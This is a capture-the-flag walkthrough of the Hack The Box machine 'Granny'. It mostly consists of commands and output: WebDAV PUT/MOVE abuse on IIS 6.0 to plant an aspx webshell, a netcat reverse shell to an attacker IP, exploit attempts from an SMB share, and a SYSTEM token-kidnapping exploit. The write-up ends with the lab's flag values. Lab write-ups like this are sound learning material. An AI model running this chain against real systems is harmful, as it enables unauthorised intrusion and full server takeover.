██╗ ██╗███████╗███████╗██████╗
██║ ██║██╔════╝██╔════╝██╔══██╗
██║ ██║███████╗█████╗ ██████╔╝
██║ ██║╚════██║██╔══╝ ██╔══██╗
╚██████╔╝███████║███████╗██║ ██║
╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
1. [root:/git/htb/granny]# nmap -Pn -n -sCV 10.10.10.15 --open (master)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Date: Tue, 02 Mar 2021 14:46:58 GMT
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
2. We instantly see that it's IIS 6.0 and webdab seems to be open. Run davtest to find out more.
[root:/git/htb/granny]# davtest -url http://10.10.10.15 (master✱)
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: YDySC7gsiCC
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_YDySC7gsiCC
********************************************************
Sending test files
PUT php SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.php
PUT cgi FAIL
PUT asp FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
PUT shtml FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.pl
PUT aspx FAIL
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jsp
PUT html SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jhtml
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.cfm
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
EXEC pl FAIL
EXEC jsp FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
EXEC jhtml FAIL
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_YDySC7gsiCC
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.php
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.pl
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jsp
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.jhtml
PUT File: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.cfm
Executes: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.txt
Executes: http://10.10.10.15/DavTestDir_YDySC7gsiCC/davtest_YDySC7gsiCC.html
Unfortunatley we are unable to upload aspx, otherwise this would be an easy webshell. However, method 'MOVE' is allowed,
meaning we can move already uploaded files and change their filename (and ending).
[root:/git/htb/granny]# mv shell.aspx shell.txt (master✱)
[root:/git/htb/granny]# curl http://10.10.10.15/ --upload-file shell.txt (master✱)
[root:/git/htb/granny]# curl -X MOVE --header "Destination:http://10.10.10.15/shell.aspx" http://10.10.10.15/shell.txt
Browse for RCE: http://10.10.10.15/shell.aspx
OR USING CADAVER:
cadaver http://granny.htb
mput fil.txt
mv fil.txt fil.aspx
2. Executing nc64.exe for a reverse shell directly through my smb share doesn't work, so upload nc64.exe the same way.
[root:/git/htb/granny]# cp /opt/nc64.exe nc64.txt
[root:/git/htb/granny]# curl http://10.10.10.15/ --upload-file nc64.txt (master✱)
[root:/git/htb/granny]# curl -X MOVE --header "Destination:http://10.10.10.15/nc64.exe" http://10.10.10.15/nc64.txt
Enumerating the box we find that nc64.exe is uploaded to 'c:\Inetpub\wwwroot\nc64.exe'
Trying to execute the binary gives nothing: c:\Inetpub\wwwroot\nc64.exe 10.10.14.8 4488 -e cmd
Lets try nc.exe instead;
[root:/git/htb/granny]# mv nc.exe nc.txt (master✱)
[root:/git/htb/granny]# curl http://10.10.10.15/ --upload-file nc.txt (master✱)
[root:/git/htb/granny]# curl -X MOVE --header "Destination:http://10.10.10.15/nc.exe" http://10.10.10.15/nc.txt
Execute RCE: c:\Inetpub\wwwroot\nc.exe 10.10.14.8 4488 -e powershell
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1082
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1083
We get a incomming connection, however the shell dies instantly. Lets try cmd instead of powershell.
Execute RCE: c:\Inetpub\wwwroot\nc.exe 10.10.14.8 4488 -e cmd
[root:/git/htb/granny]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1085
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
3. Grab the 'systeminfo' and use windows-exploit-suggester.
[root:/git/htb/granny]# python /opt/windows-exploit-suggester.py --update (master✱)
[*] initiating winsploit version 3.3...
[+] writing to file 2021-03-02-mssb.xls
[*] done
[root:/git/htb/granny]# python /opt/windows-exploit-suggester.py --database 2021-03-02-mssb.xls --systeminfo systeminfo.txt
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
MS14-070:
No output when executing binary
MS15-051:
Froze/crashed shell
MS14-068:
C:\Inetpub\wwwroot> //10.10.14.8/share/MS14-068.exe
Traceback (most recent call last):
File "<string>", line 14, in <module>
File "Z:\usr\share\pyinstaller\PyInstaller-3.1.1\PyInstaller\loader\pyimod03_importers.py", line 315, in load_module
File "Z:\usr\share\pyinstaller\PyInstaller-3.1.1\PyInstaller\loader\pyimod02_archive.py", line 323, in extract
IOError: [Errno 9] Bad file descriptor
ms14-068 returned -1
MS15-010:
C:\Inetpub\wwwroot> //10.10.14.8/share/39035.exe
The image file \\10.10.14.8\share\39035.exe is valid, but is for a machine type other than the current machine.
MS14-040:
C:\Inetpub\wwwroot> //10.10.14.8/share/MS14-40-x86.exe
[+] creating socket...
[+] got sock 0x668
[+] sock connected.
[+] GO!
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x80800000L
[+] HalDispatchTable address: 0x8088e078L
Traceback (most recent call last):
File "<string>", line 158, in <module>
TypeError: unsupported operand type(s) for +: 'NoneType' and 'int'
4. None of the exploits are giving anything of use. Googling about 'windows 2003 privilege escalation' and we find MS09-012,
Privelege Escalation via Token Kidnapping.
Setup a local SMB Server again and try the exploit:
[root:/srv/pub-share]# smbserver.py share .
[root:/srv/pub-share]# cp /opt/windows-kernel-exploits/MS09-012/pr.exe .
C:\Documents and Settings> //10.10.14.8/share/pr.exe "whoami"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1756
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:whoami
nt authority\system
It works, we are nt authority\system! Grab user- and root.txt
C:\Documents and Settings> //10.10.14.8/share/pr.exe "type Lakis\Desktop\user.txt"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1756
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:type Lakis\Desktop\user.txt
700c5dc163014e22b3e408f8703f67d1
C:\Documents and Settings> //10.10.14.8/share/pr.exe "type Administrator\Desktop\root.txt"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 3564
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:type Administrator\Desktop\root.txt
aa4beed1c0584445ab463a6747bd06e9
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
MS09-012: https://medium.com/@nmappn/windows-privelege-escalation-via-token-kidnapping-6195edd2660e https://www.exploit-db.com/exploits/6705